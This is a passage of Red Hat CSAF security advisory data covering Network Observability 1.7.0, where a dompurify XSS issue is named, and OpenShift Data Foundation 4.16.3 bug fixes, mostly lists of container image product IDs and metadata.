"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "dompurify: XSS vulnerability via prototype pollution"
}
]
}
RHSA-2024_8113
Vulnerability from csaf_redhat - Published: 2024-10-15 08:52 - Updated: 2024-12-18 04:39Summary
Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.16.3 security and bug fix update
Notes
Topic
Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.3 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.
Details
Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multi-cloud data management service with an
S3 compatible API.
Bug fixes:
* Previously, on the disaster recover (DR) monitoring dashboard, the detail about `Last snapshot synced` was missing for appset based applications. With this fix, the dashboard shows the `lastGroupSyncTime` under the `Volume snapshot` for the selected appset based applications. (BZ#2295324)
* Previously, when OpenShift Data Foundation was installed in a namespace other than `openshift-storage`, such as ROSA, the user interface (UI) labelled the nodes during the StorageSystem deployment and added a dynamic label "cluster.ocs.openshift.io/<CLUSTER_NAMESPACE>: ‘'", where "CLUSTER_NAMESPACE" is the namespace in which the StorageSystem is getting created). However the ODF/OCS operators expected the label to be always a static label, "cluster.ocs.openshift.io/openshift-storage: ‘’.
With this fix, the user interface adds a static label "cluster.ocs.openshift.io/openshift-storage: ‘’ to the nodes and as a result the installation proceeds as expected. (BZ#2303083)
Enhancement:
* In the storage clients table of the Storage clients page of the OpenShift web console, storage cluster name is displayed along with the cluster ID to provide better clarity. (BZ#2304905)
All users of Red Hat OpenShift Data Foundation are advised to upgrade to these updated images, which provide these bug fixes.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Updated images that fix several bugs are now available for Red Hat OpenShift Data Foundation 4.16.3 on Red Hat Enterprise Linux 9 from Red Hat Container Registry.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multi-cloud data management service with an\nS3 compatible API.\n\nBug fixes:\n\n* Previously, on the disaster recover (DR) monitoring dashboard, the detail about `Last snapshot synced` was missing for appset based applications. With this fix, the dashboard shows the `lastGroupSyncTime` under the `Volume snapshot` for the selected appset based applications. (BZ#2295324)\n\n* Previously, when OpenShift Data Foundation was installed in a namespace other than `openshift-storage`, such as ROSA, the user interface (UI) labelled the nodes during the StorageSystem deployment and added a dynamic label \"cluster.ocs.openshift.io/\u003cCLUSTER_NAMESPACE\u003e: \u2018\u0027\", where \"CLUSTER_NAMESPACE\" is the namespace in which the StorageSystem is getting created). However the ODF/OCS operators expected the label to be always a static label, \"cluster.ocs.openshift.io/openshift-storage: \u2018\u2019.\nWith this fix, the user interface adds a static label \"cluster.ocs.openshift.io/openshift-storage: \u2018\u2019 to the nodes and as a result the installation proceeds as expected. (BZ#2303083)\n\nEnhancement:\n\n* In the storage clients table of the Storage clients page of the OpenShift web console, storage cluster name is displayed along with the cluster ID to provide better clarity. (BZ#2304905)\n\nAll users of Red Hat OpenShift Data Foundation are advised to upgrade to these updated images, which provide these bug fixes.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:8113",
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2283959",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283959"
},
{
"category": "external",
"summary": "2295324",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2295324"
},
{
"category": "external",
"summary": "2296521",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2296521"
},
{
"category": "external",
"summary": "2300333",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300333"
},
{
"category": "external",
"summary": "2302463",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302463"
},
{
"category": "external",
"summary": "2303083",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303083"
},
{
"category": "external",
"summary": "2304905",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304905"
},
{
"category": "external",
"summary": "2308445",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308445"
},
{
"category": "external",
"summary": "2310370",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310370"
},
{
"category": "external",
"summary": "2312055",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312055"
},
{
"category": "external",
"summary": "2315708",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315708"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8113.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.16.3 security and bug fix update",
"tracking": {
"current_release_date": "2024-12-18T04:39:02+00:00",
"generator": {
"date": "2024-12-18T04:39:02+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2024:8113",
"initial_release_date": "2024-10-15T08:52:38+00:00",
"revision_history": [
{
"date": "2024-10-15T08:52:38+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-15T08:52:38+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-18T04:39:02+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHODF 4.16 for RHEL 9",
"product": {
"name": "RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_data_foundation:4.16::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Data Foundation"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"product": {
"name": "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"product_id": "odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c?arch=s390x\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"product_id": "odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"product": {
"name": "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"product_id": "odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"product_id": "odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d?arch=s390x\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"product": {
"name": "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"product_id": "odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"product": {
"name": "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"product_id": "odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"product": {
"name": "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"product_id": "odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"product": {
"name": "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"product_id": "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-operator-bundle\u0026tag=v4.16.3-2"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"product_id": "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13?arch=s390x\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"product_id": "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"product": {
"name": "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"product_id": "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-console-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"product": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"product_id": "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"product_identification_helper": {
"purl": "pkg:oci/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30?arch=s390x\u0026repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9\u0026tag=v4.16.3-1"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"product": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
